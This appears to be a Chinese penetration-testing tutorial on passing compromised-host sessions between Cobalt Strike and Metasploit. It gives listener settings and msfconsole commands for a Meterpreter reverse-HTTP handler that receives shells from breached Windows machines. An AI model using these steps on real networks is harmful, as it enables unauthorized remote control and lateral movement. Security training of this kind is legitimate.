72内网安全-域横向CS&MSF联动及应急响应知识

拿到才行,拿不到就是多余的

案例一MSF&CobaltStrike 联动 Shell

有一些功能可能cs或者msf强大一些,他们两个可以相互调用,在真实情况下也是可以cs和msf同时启动的,

cs移交给msf

.创建Foreign监听器

"Listeners""Add","Name"填"msf"(可随便填),"Payload"选"Foreign HTTP","HTTP Host(Stager)"填msf的IP地址,"HTTP Port(Stager)"端口自己设定

协议不够的时候可以添加插件,

2.MSF监听模块设置对应地址端口

选择监听模块

use exploit/multi/handler

设置payload,注意与CS保持一致

set payload windows/meterpreter/reverse_http

设置地址端口,其中地址可以不设或为0.0.0.0,意为任意地址,或者设为msf的IP地址(与CS保持一致);端口一定要保持一致

set lhost 0.0.0.0

set lport 6677

检查设置

show options

执行

exploit

3.CS执行Spawn选择监听器

选择需要反弹shell的电脑,右键"Spawn",选择刚才生成的监听器

稍等可在MSF上看见反弹结果,如果没有请检查网络

然后选择自己想反弹的主机的shell。

会话就弹出来了

msf移交给cs

CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线

我们的目的就是反弹到cs刚刚生成的监听器,我们要返回s4,就是那个5566端口的

进入相关模块,设置对应的东西,ip,端口,s4等等

ip设置为刚刚cs的ip监听的端口就可以了,运行,cs等待上线

就完成了上线

ping

an

相关推荐
Guheyunyi5 小时前
监测预警系统重塑隧道安全新范式
大数据·运维·人工智能·科技·安全
IT科技那点事儿6 小时前
引领AI安全新时代 Accelerate 2025北亚巡展·北京站成功举办
人工智能·安全
恰薯条的屑海鸥11 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十四期-XXE模块)
网络·学习·安全·web安全·渗透测试
20242817李臻11 小时前
20242817李臻-安全文件传输系统-项目验收
数据库·安全
DevSecOps选型指南20 小时前
2025软件供应链安全最佳实践︱证券DevSecOps下供应链与开源治理实践
网络·安全·web安全·开源·代码审计·软件供应链安全
ABB自动化20 小时前
for AC500 PLCs 3ADR025003M9903的安全说明
服务器·安全·机器人
恰薯条的屑海鸥20 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十六期-SSRF模块)
数据库·学习·安全·web安全·渗透测试·网络安全学习
阿部多瑞 ABU21 小时前
主流大语言模型安全性测试(三):阿拉伯语越狱提示词下的表现与分析
人工智能·安全·ai·语言模型·安全性测试
moongoblin1 天前
行业赋能篇-2-能源行业安全运维升级
运维·安全·协作
Fortinet_CHINA1 天前
引领AI安全新时代 Accelerate 2025北亚巡展·北京站成功举办
网络·安全